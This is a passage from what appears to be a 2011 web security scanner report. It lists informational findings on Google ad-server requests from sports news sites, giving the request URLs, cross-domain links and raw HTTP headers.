Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.120. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983550&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550231&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965550274&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=102&xpc=dku4JBfkuZ&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMJy0gu0e6hq_ayDGovBdy9v-PVNAAAAAIwuAAC1AAAAlgIAAAIAAABMSAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAXA8BAgUCAQQAAAAAPh8n1gAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307965551%29%3Buf%28%27r%27%2C+411724%2C+1307965551%29%3B&cnd=!thx3ywi9gwUQzJAZGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBIgBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!pARxJQi9gwUQzJAZGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX4bgAO6zEK7GXvTa8Sp21qEn1j2g77ieSo7g&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBmNRbvj1TbHWO-_LsQenpbztBNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALeB8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtz6jFSI2BwglDLlvmtE5oz1KzkR8g%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983550&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550231&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965550274&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=102&xpc=dku4JBfkuZ&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.121. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988149&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970149469&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307970149989&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1346432479&ga_fc=1&u_tz=-300&u_his=25&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=872&xpc=Q2VYCWZw9H&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3Dwww.SageTimeslips.com%26adT%3DEmployee%2BManagement%26gl%3DUS&usg=AFQjCNFo3TwwZKW6GwV-RmCTU5LnXZtt2Q

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988149&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970149469&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307970149989&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1346432479&ga_fc=1&u_tz=-300&u_his=25&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=872&xpc=Q2VYCWZw9H&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.122. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986925&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968925025&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968924605&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=462082330&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=67&xpc=6NdN1JnUXI&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Dovico.com%26adT%3DOnline%2BTimesheet%2BTracking%26adU%3Dwww.Comcast.com/Xfinity%26adT%3DComcast%25C2%25AE%2B%252499%2BBundle%2BOffer%26adU%3Dwww.Onebox.com%26adT%3DCreate%2Ba%2BVirtual%2BOffice%26gl%3DUS&usg=AFQjCNEJ8eXh3dmALZ4Nux2SvOyMfj2eHw

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986925&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968925025&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968924605&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=462082330&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=67&xpc=6NdN1JnUXI&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.123. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986012&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011822&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968011518&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=789&xpc=GcZegGsii9&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3DMyLocalComcast.com%26adT%3DTriple%2BPlay%2BFrom%2BXFINITY%25C2%25AE%26adU%3Dwww.FloridaTechOnline.com%26adT%3DEarn%2BYour%2BDegree%2B-%2BOnline%26gl%3DUS&usg=AFQjCNHuEhXfXzUVkUKWsvQSD76_6Szkcw

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986012&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011822&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968011518&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=789&xpc=GcZegGsii9&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.124. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307981998&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963997700&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307963998240&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&eid=33895142&fu=0&ifi=1&dtd=571&xpc=hXVVEBJ7DU&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQDkE_s-NtOkJ_ayDGovBdy9f8vVNAAAAAIwuAAC1AAAANQEAAAIAAABrowUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA-hABAgUCAQQAAAAAyR-C1AAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307963999%29%3Buf%28%27r%27%2C+369515%2C+1307963999%29%3Bppv%2811776%2C+%27714300537087853625%27%2C+1307963999%2C+1310555999%2C+62058%2C+25553%29%3B&cnd=!IR4JVAjq5AMQ68YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAB4AIABpAGIAQKQAQGYAQGgAQOoAQOwAQG5AZmZmQXXIxNAwQGZmZkF1yMTQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!ggXiLgjq5AMQ68YWGNHHASAA&referrer=http://www.twackle.com/&pp=TfXyXgAOT28K5QPjiiFNjs7-DqP7CU-xAYe2AQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRoCOXvL1Te-eOeOHlAeOm4XRCO_675oCr5z7xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEXaHR0cDovL3d3dy50d2Fja2xlLmNvbS-YAvokwAIEyAKrgqUOqAMB6AOIAugDtQjoA-kH6AO6COgDggL1AwAAAMCABvSgy_KoovzeXw%26num%3D1%26sig%3DAGiWqtyXZgXhqAnfCxu9xhZ_afwDZNBT3A%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307981998&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963997700&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307963998240&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&eid=33895142&fu=0&ifi=1&dtd=571&xpc=hXVVEBJ7DU&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.125. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985706&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967705290&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967704990&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=740252110&ga_fc=1&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=792&xpc=qSHXbnQoWD&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DFree%2BTrial%2BTimesheet%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3Dwww.crwww.com/QMOD-HD.asp%26adT%3DQMOD-HD%2BHDTV%2BModulator%26gl%3DUS&usg=AFQjCNHEEQz3NPKOQn9LnQ1g3azOF52Tbg

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985706&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967705290&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967704990&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=740252110&ga_fc=1&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=792&xpc=qSHXbnQoWD&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.126. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468285&bpp=5&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966468319&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=80&xpc=GEVMBFEjsI&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKDnkZhNUPdg_ayDGovBdy8F_PVNAAAAAIwuAAC1AAAAlgIAAAIAAABtPwYA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAIg8BAgUCAQQAAAAA-x4-0gAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17979%2C+1307966469%29%3Buf%28%27c%27%2C+81255%2C+1307966469%29%3Buf%28%27r%27%2C+409453%2C+1307966469%29%3B&cnd=!rh2hMwjn-gQQ7f4YGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!0gWuMQjn-gQQ7f4YGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX8BQABWbQK5XaqnT4R0Oqejqymq4K4Lk1Y6Q&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB0qOfBfz1TbSzBartlQfQo_jpCdfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCqA_AAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtyj9eRGRlk2VYHLKcwsc_ANC0JuMA%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468285&bpp=5&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966468319&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=80&xpc=GEVMBFEjsI&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.127. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1747433502656032&output=html&h=250&slotname=5971138435&w=250&lmt=1307980689&flash=10.3.181&url=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&dt=1307962930665&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962931010&frm=4&adk=3116141599&ga_vid=1991767657.1307962895&ga_sid=1307962895&ga_hid=798484996&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&fu=0&ifi=1&dtd=8183&xpc=pxKruGYxhr&p=http%3A//www.mavsmoneyball.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110601/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26hl%3Den%26client%3Dca-pub-1747433502656032%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGyQDso9LznPjBPZ73WfYdqOsPwwA

Request

GET /pagead/ads?client=ca-pub-1747433502656032&output=html&h=250&slotname=5971138435&w=250&lmt=1307980689&flash=10.3.181&url=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&dt=1307962930665&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962931010&frm=4&adk=3116141599&ga_vid=1991767657.1307962895&ga_sid=1307962895&ga_hid=798484996&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&fu=0&ifi=1&dtd=8183&xpc=pxKruGYxhr&p=http%3A//www.mavsmoneyball.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.128. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

